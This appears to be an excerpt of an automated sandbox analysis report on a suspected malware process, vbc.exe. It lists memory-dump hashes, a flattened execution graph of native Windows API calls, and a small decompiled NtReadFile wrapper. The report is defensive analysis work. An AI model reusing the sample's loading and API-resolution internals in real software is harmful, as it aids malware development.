                                                    • Opcode ID: 48aade6fffce7ff81ea845b7a7916d8cfec27683ed8b600e11110dba56a1c0dd
                                                    • Instruction ID: dd6db962cf6dae46bd8f3edd2885f904353646bf877d85f550a2473837d17bcb
                                                    • Opcode Fuzzy Hash: 48aade6fffce7ff81ea845b7a7916d8cfec27683ed8b600e11110dba56a1c0dd
                                                    • Instruction Fuzzy Hash: 1EF0A0393000515FC744F76EE401EAE73DA9BC92547599069E10ACB76AEF20DD0ACBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 63090d4caa6e73eacc46074871f926aa5a39210713177770f327ee3463452a8d
                                                    • Instruction ID: ac7c38b11da09668aa58b981ac2fabb2d729c906f2197478cd779acf815d9e6b
                                                    • Opcode Fuzzy Hash: 63090d4caa6e73eacc46074871f926aa5a39210713177770f327ee3463452a8d
                                                    • Instruction Fuzzy Hash: E1011474900249CFDB50EFA4D848BACBBB1FB09311F1080AAD40AA7395CB705DC4CF64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d288a3a15b982495d9f53ea7a9b798105a3933a375f996e6299e238e5e8eeb77
                                                    • Instruction ID: 0f1c908e0f4deb8f67b3280c6543a970c4fb2feb0044ece98065bb0d5d7a364e
                                                    • Opcode Fuzzy Hash: d288a3a15b982495d9f53ea7a9b798105a3933a375f996e6299e238e5e8eeb77
                                                    • Instruction Fuzzy Hash: 0AE08631340065678A5C33F59815A2F71CA8BC4555311803EE61FC7791DF268D0247E6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e13bba3cdf3138c61c1ee063edcf20c46381f4710ddff3cdab31eca329225ba5
                                                    • Instruction ID: 7b89755fd329a6692ed8de2ed73c1f2de137af63ccd024f9ef447798ac4081cf
                                                    • Opcode Fuzzy Hash: e13bba3cdf3138c61c1ee063edcf20c46381f4710ddff3cdab31eca329225ba5
                                                    • Instruction Fuzzy Hash: 29E06D30A29381CFC702577898245B97AE25F06318F5985E6D5A18F2E3DB348D59C762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b313bdf45c8ec37926c5b0040740d19d091ba3585a5333336e461c9e6a3c95f0
                                                    • Instruction ID: 33ee349e02766a4e922da29b5a3cb88292c68995d04c81d2d26eae5fb1f44635
                                                    • Opcode Fuzzy Hash: b313bdf45c8ec37926c5b0040740d19d091ba3585a5333336e461c9e6a3c95f0
                                                    • Instruction Fuzzy Hash: 99E09A30909388AFCB12EFB4E81085DBFB4EF83200B1546EFD444E7292EA301F049B52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2733ac0a3b12662ee23456160972f96adfe8dc724e4518e7d2c1e9c1eda4aa82
                                                    • Instruction ID: 75eaf150ada00530500f1d2f51ccfdefdea45681607cb32c876e06a366d3c1b1
                                                    • Opcode Fuzzy Hash: 2733ac0a3b12662ee23456160972f96adfe8dc724e4518e7d2c1e9c1eda4aa82
                                                    • Instruction Fuzzy Hash: 3EF0FFB4D54369CFCBA6CF25C940698BBF9AB59300F5091DAE41DA3211DB705F94DF00
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b9ce843c00c141820758a2b07cfeca06cc3e9b131fd7d8cf392ccceacc19445c
                                                    • Instruction ID: 5bd27df34ef09606395b6e8b3b36f8eaa47f32c2539903a1c856e0f29724a99a
                                                    • Opcode Fuzzy Hash: b9ce843c00c141820758a2b07cfeca06cc3e9b131fd7d8cf392ccceacc19445c
                                                    • Instruction Fuzzy Hash: 03E0C274921228CBEB20AFA1CC08B9CBBB1FB4A301F0002AAD50DB3294C7740E808F25
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1388583109843fa0a97af5dc53699f36ca041c66f1ed81834f55a9368dade795
                                                    • Instruction ID: 0b1aaac58e643c48a7c78318ecccee8ba028b5d51d3148b28c15e36235f56220
                                                    • Opcode Fuzzy Hash: 1388583109843fa0a97af5dc53699f36ca041c66f1ed81834f55a9368dade795
                                                    • Instruction Fuzzy Hash: 0ED01770A0020CEB8B50EFA8E90199DB7B9EB85204B6086A99409E3244EB312F009B81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 642f82ce486c23210a4ac6af8bdf30f92dcce751fb193267b4d66626c5d72a62
                                                    • Instruction ID: fc233bdcc83937f400c1bf7eb5f54f09775717c272b56fec9166aa2b86843804
                                                    • Opcode Fuzzy Hash: 642f82ce486c23210a4ac6af8bdf30f92dcce751fb193267b4d66626c5d72a62
                                                    • Instruction Fuzzy Hash: EAB092313A42090AEAA09BF6780672672CC8780A18FC40475F40CC5D00EA56E8A01241
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0\D
                                                    • API String ID: 0-3163925331
                                                    • Opcode ID: 7d83990e0985833e853929773f94a97f02843e347adf24a570bb8709781256ba
                                                    • Instruction ID: e614ff02143a8ef354e6355bd4e4ea24712150d1334eb24dcbefe64585f99031
                                                    • Opcode Fuzzy Hash: 7d83990e0985833e853929773f94a97f02843e347adf24a570bb8709781256ba
                                                    • Instruction Fuzzy Hash: 71517170D142488FDB54EFBAE841A9DBBF3AF89304F14D539D004AB769EB3099458BD1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e132bea526ea08dd9552379c641606b21898df9d239be95e474534046cbfd15e
                                                    • Instruction ID: dea1f455b702b703ad6e38ea90276275afcced97dc4fd810a58bb8ce3c383775
                                                    • Opcode Fuzzy Hash: e132bea526ea08dd9552379c641606b21898df9d239be95e474534046cbfd15e
                                                    • Instruction Fuzzy Hash: EA310879E6111E8FDF10CFAAE881AADF3F2BF48304B54E215E015EB245DB31A955CB40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c100a01df3edf217849b206a3cee57d6bdc197301a38f23abfd144eb54298245
                                                    • Instruction ID: cc7dcf40890744c08d20b389e22c3d37e780c9b387cb885036ef6106504cc196
                                                    • Opcode Fuzzy Hash: c100a01df3edf217849b206a3cee57d6bdc197301a38f23abfd144eb54298245
                                                    • Instruction Fuzzy Hash: 5C4139B1E056588BE71CCF6B8C4069EFAF3AFC9200F14C1BA855DA6265EB3005868F55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7385485b40fa4b8d0c982e7ccc1b4a5d647648e5de344bbf254a364e6e55bba3
                                                    • Instruction ID: cd73e3084a9e73c792fbbe795811bbd9b0b2fb1072e2ff77e86d17059375a366
                                                    • Opcode Fuzzy Hash: 7385485b40fa4b8d0c982e7ccc1b4a5d647648e5de344bbf254a364e6e55bba3
                                                    • Instruction Fuzzy Hash: 343109B1E016188BEB1CCF6B8D4068EFAF7BFC8300F54C1BA890C6A225DB3005868F55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Execution Graph

                                                    Execution Coverage: 3.5%
                                                    Dynamic/Decrypted Code Coverage: 2.4%
                                                    Signature Coverage: 5.8%
                                                    Total number of Nodes: 583
                                                    Total number of Limit Nodes: 69

                                                    Graph

                                                    [Execution graph: interactive node/edge rendering not reproducible as text. Nodes are function addresses in the vbc.exe process (e.g. 41d460, 419c00, 408b70, 40d180, 40a620, 418940); leaf nodes are labelled with the Windows APIs reached from them: LdrLoadDll, ExitProcess, NtCreateFile, NtReadFile, NtClose, RtlAllocateHeap, LdrInitializeThunk.]
2 API calls 41991->41996 41997 4134e5 41992->41997 41995 418720 2 API calls 41993->41995 42002 413511 41994->42002 42028 41a290 41994->42028 41998 4134ff 41995->41998 41999 413649 41996->41999 41997->41929 41998->41929 41999->41929 42010 413523 42002->42010 42031 4186a0 42002->42031 42003 413577 42004 41358e 42003->42004 42039 418530 LdrLoadDll 42003->42039 42006 413595 42004->42006 42007 4135aa 42004->42007 42008 418720 2 API calls 42006->42008 42009 418720 2 API calls 42007->42009 42008->42010 42011 4135b3 42009->42011 42010->41929 42012 4135df 42011->42012 42034 419e90 42011->42034 42012->41929 42014 4135ca 42015 41a0c0 2 API calls 42014->42015 42016 4135d3 42015->42016 42016->41929 42017->41901 42018->41923 42020 413d24 42019->42020 42021 4191f0 LdrLoadDll 42019->42021 42022 4185b0 LdrLoadDll 42020->42022 42021->42020 42022->41925 42024 41873c NtClose 42023->42024 42025 4191f0 LdrLoadDll 42023->42025 42024->41930 42025->42024 42026->41910 42027->41974 42041 4188c0 42028->42041 42030 41a2a8 42030->42002 42032 4191f0 LdrLoadDll 42031->42032 42033 4186bc NtReadFile 42032->42033 42033->42003 42035 419eb4 42034->42035 42036 419e9d 42034->42036 42035->42014 42036->42035 42037 41a290 2 API calls 42036->42037 42038 419ecb 42037->42038 42038->42014 42039->42004 42040->41991 42042 4191f0 LdrLoadDll 42041->42042 42043 4188dc RtlAllocateHeap 42042->42043 42043->42030 42045 41a057 42044->42045 42175 4187d0 42045->42175 42047 41a06d 42047->41935 42049 413081 42048->42049 42051 413089 42048->42051 42049->41938 42050 41335c 42050->41938 42051->42050 42178 41b270 42051->42178 42053 4130dd 42054 41b270 2 API calls 42053->42054 42058 4130e8 42054->42058 42055 413136 42057 41b270 2 API calls 42055->42057 42061 41314a 42057->42061 42058->42055 42059 41b3a0 3 API calls 42058->42059 42189 41b310 LdrLoadDll RtlAllocateHeap RtlFreeHeap 42058->42189 42059->42058 42060 4131a7 42062 41b270 2 API calls 42060->42062 42061->42060 42183 41b3a0 42061->42183 42064 4131bd 42062->42064 42065 
4131fa 42064->42065 42067 41b3a0 3 API calls 42064->42067 42066 41b270 2 API calls 42065->42066 42068 413205 42066->42068 42067->42064 42069 41b3a0 3 API calls 42068->42069 42075 41323f 42068->42075 42069->42068 42071 413334 42191 41b2d0 LdrLoadDll RtlFreeHeap 42071->42191 42073 41333e 42192 41b2d0 LdrLoadDll RtlFreeHeap 42073->42192 42190 41b2d0 LdrLoadDll RtlFreeHeap 42075->42190 42076 413348 42193 41b2d0 LdrLoadDll RtlFreeHeap 42076->42193 42078 413352 42194 41b2d0 LdrLoadDll RtlFreeHeap 42078->42194 42081 4143b1 42080->42081 42082 413a60 8 API calls 42081->42082 42084 4143c7 42082->42084 42083 41441a 42083->41942 42084->42083 42085 414402 42084->42085 42086 414415 42084->42086 42087 41a0c0 2 API calls 42085->42087 42088 41a0c0 2 API calls 42086->42088 42089 414407 42087->42089 42088->42083 42089->41942 42195 418ec0 42090->42195 42093 418ec0 LdrLoadDll 42094 41901d 42093->42094 42095 418ec0 LdrLoadDll 42094->42095 42096 419026 42095->42096 42097 418ec0 LdrLoadDll 42096->42097 42098 41902f 42097->42098 42099 418ec0 LdrLoadDll 42098->42099 42100 419038 42099->42100 42101 418ec0 LdrLoadDll 42100->42101 42102 419041 42101->42102 42103 418ec0 LdrLoadDll 42102->42103 42104 41904d 42103->42104 42105 418ec0 LdrLoadDll 42104->42105 42106 419056 42105->42106 42107 418ec0 LdrLoadDll 42106->42107 42108 41905f 42107->42108 42109 418ec0 LdrLoadDll 42108->42109 42110 419068 42109->42110 42111 418ec0 LdrLoadDll 42110->42111 42112 419071 42111->42112 42113 418ec0 LdrLoadDll 42112->42113 42114 41907a 42113->42114 42115 418ec0 LdrLoadDll 42114->42115 42116 419086 42115->42116 42117 418ec0 LdrLoadDll 42116->42117 42118 41908f 42117->42118 42119 418ec0 LdrLoadDll 42118->42119 42120 419098 42119->42120 42121 418ec0 LdrLoadDll 42120->42121 42122 4190a1 42121->42122 42123 418ec0 LdrLoadDll 42122->42123 42124 4190aa 42123->42124 42125 418ec0 LdrLoadDll 42124->42125 42126 4190b3 42125->42126 42127 418ec0 LdrLoadDll 42126->42127 42128 4190bf 42127->42128 42129 418ec0 LdrLoadDll 
42128->42129 42130 4190c8 42129->42130 42131 418ec0 LdrLoadDll 42130->42131 42132 4190d1 42131->42132 42133 418ec0 LdrLoadDll 42132->42133 42134 4190da 42133->42134 42135 418ec0 LdrLoadDll 42134->42135 42136 4190e3 42135->42136 42137 418ec0 LdrLoadDll 42136->42137 42138 4190ec 42137->42138 42139 418ec0 LdrLoadDll 42138->42139 42140 4190f8 42139->42140 42141 418ec0 LdrLoadDll 42140->42141 42142 419101 42141->42142 42143 418ec0 LdrLoadDll 42142->42143 42144 41910a 42143->42144 42145 418ec0 LdrLoadDll 42144->42145 42146 419113 42145->42146 42147 418ec0 LdrLoadDll 42146->42147 42148 41911c 42147->42148 42149 418ec0 LdrLoadDll 42148->42149 42150 419125 42149->42150 42151 418ec0 LdrLoadDll 42150->42151 42152 419131 42151->42152 42153 418ec0 LdrLoadDll 42152->42153 42154 41913a 42153->42154 42155 418ec0 LdrLoadDll 42154->42155 42156 419143 42155->42156 42157 418ec0 LdrLoadDll 42156->42157 42158 41914c 42157->42158 42159 418ec0 LdrLoadDll 42158->42159 42160 419155 42159->42160 42161 418ec0 LdrLoadDll 42160->42161 42162 41915e 42161->42162 42163 418ec0 LdrLoadDll 42162->42163 42164 41916a 42163->42164 42165 418ec0 LdrLoadDll 42164->42165 42166 419173 42165->42166 42167 418ec0 LdrLoadDll 42166->42167 42168 41917c 42167->42168 42168->41946 42170 4191f0 LdrLoadDll 42169->42170 42171 41816c 42170->42171 42201 8dfdc0 LdrInitializeThunk 42171->42201 42172 418183 42172->41867 42174->41943 42176 4187ec NtAllocateVirtualMemory 42175->42176 42177 4191f0 LdrLoadDll 42175->42177 42176->42047 42177->42176 42179 41b280 42178->42179 42180 41b286 42178->42180 42179->42053 42181 41a290 2 API calls 42180->42181 42182 41b2ac 42181->42182 42182->42053 42184 41b310 42183->42184 42185 41a290 2 API calls 42184->42185 42187 41b36d 42184->42187 42186 41b34a 42185->42186 42188 41a0c0 2 API calls 42186->42188 42187->42061 42188->42187 42189->42058 42190->42071 42191->42073 42192->42076 42193->42078 42194->42050 42196 418edb 42195->42196 42197 413e60 LdrLoadDll 42196->42197 42198 418efb 42197->42198 
42199 413e60 LdrLoadDll 42198->42199 42200 418fa7 42198->42200 42199->42200 42200->42093 42201->42172 42202->41952 42204 41891c RtlFreeHeap 42203->42204 42205 4191f0 LdrLoadDll 42203->42205 42204->41956 42205->42204 42207 406e40 42206->42207 42208 406e3b 42206->42208 42209 41a040 2 API calls 42207->42209 42208->41875 42215 406e65 42209->42215 42210 406ec8 42210->41875 42211 418150 2 API calls 42211->42215 42212 406ece 42214 406ef4 42212->42214 42216 418850 2 API calls 42212->42216 42214->41875 42215->42210 42215->42211 42215->42212 42218 41a040 2 API calls 42215->42218 42222 418850 42215->42222 42217 406ee5 42216->42217 42217->41875 42218->42215 42220 40710e 42219->42220 42221 418850 2 API calls 42219->42221 42220->41832 42221->42220 42223 4191f0 LdrLoadDll 42222->42223 42224 41886c 42223->42224 42227 8dfb68 LdrInitializeThunk 42224->42227 42225 418883 42225->42215 42227->42225 42229 419853 42228->42229 42232 409b50 42229->42232 42233 409b74 42232->42233 42234 409bb0 LdrLoadDll 42233->42234 42235 408a8b 42233->42235 42234->42235 42235->41840 42238 409ec3 42236->42238 42237 409f40 42237->41845 42238->42237 42251 417f20 LdrLoadDll 42238->42251 42241 4191f0 LdrLoadDll 42240->42241 42242 40cfbb 42241->42242 42242->41848 42243 418a60 42242->42243 42244 418a7f LookupPrivilegeValueW 42243->42244 42245 4191f0 LdrLoadDll 42243->42245 42244->41850 42245->42244 42247 4191f0 LdrLoadDll 42246->42247 42248 41850c 42247->42248 42252 8dfed0 LdrInitializeThunk 42248->42252 42249 41852b 42249->41851 42251->42237 42252->42249 42254 40a047 42253->42254 42255 409ea0 LdrLoadDll 42254->42255 42256 40a076 42255->42256 42256->41775 42258 40d0aa 42257->42258 42266 40d160 42257->42266 42259 409ea0 LdrLoadDll 42258->42259 42260 40d0cc 42259->42260 42267 4181d0 42260->42267 42262 40d10e 42270 418210 42262->42270 42265 418720 2 API calls 42265->42266 42266->41778 42266->41779 42268 4191f0 LdrLoadDll 42267->42268 42269 4181ec 42268->42269 42269->42262 42271 4191f0 LdrLoadDll 42270->42271 42272 
41822c 42271->42272 42275 8e07ac LdrInitializeThunk 42272->42275 42273 40d154 42273->42265 42275->42273 42278 409ca1 42276->42278 42277 409cad 42277->41789 42278->42277 42279 409cca 42278->42279 42280 409cfc 42278->42280 42322 417f60 LdrLoadDll 42279->42322 42323 417f60 LdrLoadDll 42280->42323 42282 409d0d 42282->41789 42284 409cec 42284->41789 42286 40d210 3 API calls 42285->42286 42287 4133d6 42285->42287 42286->42287 42287->41791 42289 4079f9 42288->42289 42324 407720 42288->42324 42291 407a1d 42289->42291 42292 407720 19 API calls 42289->42292 42291->41793 42293 407a0a 42292->42293 42293->42291 42342 40d480 10 API calls 42293->42342 42296 4191f0 LdrLoadDll 42295->42296 42297 4187ac 42296->42297 42461 8dfea0 LdrInitializeThunk 42297->42461 42298 40a782 42300 40d210 42298->42300 42301 40d22d 42300->42301 42462 418250 42301->42462 42304 40d275 42304->41797 42305 4182a0 2 API calls 42306 40d29e 42305->42306 42306->41797 42308 4191f0 LdrLoadDll 42307->42308 42309 4182bc 42308->42309 42468 8dfc60 LdrInitializeThunk 42309->42468 42310 40a7e5 42310->41803 42310->41806 42313 4191f0 LdrLoadDll 42312->42313 42314 41830c 42313->42314 42469 8dfc90 LdrInitializeThunk 42314->42469 42315 40a8b9 42315->41814 42318 4191f0 LdrLoadDll 42317->42318 42319 4180cc 42318->42319 42470 8e0078 LdrInitializeThunk 42319->42470 42320 40a90c 42320->41818 42322->42284 42323->42282 42325 406e30 4 API calls 42324->42325 42330 40773a 42324->42330 42325->42330 42326 4079c9 42326->42289 42327 4079bf 42328 4070f0 2 API calls 42327->42328 42328->42326 42330->42326 42330->42327 42332 418190 2 API calls 42330->42332 42334 418720 LdrLoadDll NtClose 42330->42334 42337 40a920 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 42330->42337 42340 4180b0 2 API calls 42330->42340 42343 417fa0 42330->42343 42346 407550 42330->42346 42358 40d360 LdrLoadDll NtClose 42330->42358 42359 418020 LdrLoadDll 42330->42359 42360 418050 LdrLoadDll 42330->42360 42361 4180e0 LdrLoadDll 42330->42361 
42362 407320 42330->42362 42378 405ea0 LdrLoadDll 42330->42378 42332->42330 42334->42330 42337->42330 42340->42330 42342->42291 42344 4191f0 LdrLoadDll 42343->42344 42345 417fbc 42344->42345 42345->42330 42347 407566 42346->42347 42379 417b10 42347->42379 42349 40757f 42357 4076f1 42349->42357 42400 407130 42349->42400 42351 407665 42352 407320 11 API calls 42351->42352 42351->42357 42353 407693 42352->42353 42354 418190 2 API calls 42353->42354 42353->42357 42355 4076c8 42354->42355 42356 418790 2 API calls 42355->42356 42355->42357 42356->42357 42357->42330 42358->42330 42359->42330 42360->42330 42361->42330 42363 407349 42362->42363 42440 407290 42363->42440 42366 418790 2 API calls 42367 40735c 42366->42367 42367->42366 42368 4073e7 42367->42368 42371 4073e2 42367->42371 42448 40d3e0 42367->42448 42368->42330 42369 418720 2 API calls 42370 40741a 42369->42370 42370->42368 42372 417fa0 LdrLoadDll 42370->42372 42371->42369 42373 40747f 42372->42373 42373->42368 42452 417fe0 42373->42452 42375 4074e3 42375->42368 42376 413a60 8 API calls 42375->42376 42377 407538 42376->42377 42377->42330 42378->42330 42380 41a290 2 API calls 42379->42380 42381 417b27 42380->42381 42407 408170 42381->42407 42383 417b42 42384 417b80 42383->42384 42385 417b69 42383->42385 42388 41a040 2 API calls 42384->42388 42386 41a0c0 2 API calls 42385->42386 42387 417b76 42386->42387 42387->42349 42389 417bba 42388->42389 42390 41a040 2 API calls 42389->42390 42391 417bd3 42390->42391 42397 417e74 42391->42397 42413 41a080 42391->42413 42394 417e60 42395 41a0c0 2 API calls 42394->42395 42396 417e6a 42395->42396 42396->42349 42398 41a0c0 2 API calls 42397->42398 42399 417ec9 42398->42399 42399->42349 42401 40722f 42400->42401 42402 407145 42400->42402 42401->42351 42402->42401 42403 413a60 8 API calls 42402->42403 42404 4071b2 42403->42404 42405 41a0c0 2 API calls 42404->42405 42406 4071d9 42404->42406 42405->42406 42406->42351 42408 408195 42407->42408 42409 409b50 LdrLoadDll 42408->42409 42410 
4081c8 42409->42410 42412 4081ed 42410->42412 42416 40b350 42410->42416 42412->42383 42434 418810 42413->42434 42417 40b37c 42416->42417 42418 418470 LdrLoadDll 42417->42418 42419 40b395 42418->42419 42420 40b39c 42419->42420 42427 4184b0 42419->42427 42420->42412 42424 40b3d7 42425 418720 2 API calls 42424->42425 42426 40b3fa 42425->42426 42426->42412 42428 4184cc 42427->42428 42429 4191f0 LdrLoadDll 42427->42429 42433 8dfbb8 LdrInitializeThunk 42428->42433 42429->42428 42430 40b3bf 42430->42420 42432 418aa0 LdrLoadDll 42430->42432 42432->42424 42433->42430 42435 4191f0 LdrLoadDll 42434->42435 42436 41882c 42435->42436 42439 8e0048 LdrInitializeThunk 42436->42439 42437 417e59 42437->42394 42437->42397 42439->42437 42441 4072a8 42440->42441 42442 409b50 LdrLoadDll 42441->42442 42443 4072c3 42442->42443 42444 413e60 LdrLoadDll 42443->42444 42445 4072d3 42444->42445 42446 4072dc PostThreadMessageW 42445->42446 42447 4072f0 42445->42447 42446->42447 42447->42367 42449 40d3f3 42448->42449 42455 418120 42449->42455 42453 417ffc 42452->42453 42454 4191f0 LdrLoadDll 42452->42454 42453->42375 42454->42453 42456 4191f0 LdrLoadDll 42455->42456 42457 41813c 42456->42457 42460 8dfd8c LdrInitializeThunk 42457->42460 42458 40d41e 42458->42367 42460->42458 42461->42298 42463 41826c 42462->42463 42464 4191f0 LdrLoadDll 42462->42464 42467 8dffb4 LdrInitializeThunk 42463->42467 42464->42463 42465 40d26e 42465->42304 42465->42305 42467->42465 42468->42310 42469->42315 42470->42320 42474 8df900 LdrInitializeThunk

                                                    Executed Functions

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 41869d-41869e 1 4186a0-4186e9 call 4191f0 NtReadFile 0->1 2 418672-418699 0->2
                                                    APIs
                                                    • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID: *9A$A:A
                                                    • API String ID: 2738559852-3393056465
                                                    • Opcode ID: 440a9c7ae0bab30013401e29e9defbe0b8e429ac0d839d9d3a50a4294f0c9365
                                                    • Instruction ID: 5c1d1326be290633bbf7c449a0da179942d7f590496206b3234f5423b5ffce47
                                                    • Opcode Fuzzy Hash: 440a9c7ae0bab30013401e29e9defbe0b8e429ac0d839d9d3a50a4294f0c9365
                                                    • Instruction Fuzzy Hash: F31190B2200109ABCB08DF8DDC91DEB73ADAF8C754B158249BA1D93241D634EC518BA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    control_flow_graph 6 4186a0-4186e9 call 4191f0 NtReadFile
                                                    C-Code - Quality: 37%
                                                     			E004186A0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
                                                     				intOrPtr _t13; // declaration missing from decompiler output, added for consistency
                                                     				char* _t4;    // declaration missing from decompiler output, added for consistency
                                                     				void* _t18;
                                                     				void* _t27;
                                                     				intOrPtr* _t28;
                                                     
                                                     				_t13 = _a4;
                                                     				_t28 = _a4 + 0xc48;
                                                     				E004191F0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                     				_t4 =  &_a40; // 0x413a41
                                                     				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4); // executed
                                                     				return _t18;
                                                     			}

                                                    APIs
                                                    • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID: A:A
                                                    • API String ID: 2738559852-2859176346
                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                    • Instruction ID: f080bec4c040545e3dab2a82d2c0628179b57ce59769f180118a0d9c745142a3
                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                    • Instruction Fuzzy Hash: 84F0A4B2200208ABDB14DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    control_flow_graph 237 409b50-409b6c 238 409b74-409b79 237->238 239 409b6f call 41af90 237->239 240 409b7b-409b7e 238->240 241 409b7f-409b8d call 41b3b0 238->241 239->238 244 409b9d-409bae call 419730 241->244 245 409b8f-409b9a call 41b630 241->245 250 409bb0-409bc4 LdrLoadDll 244->250 251 409bc7-409bca 244->251 245->244 250->251
                                                    C-Code - Quality: 100%
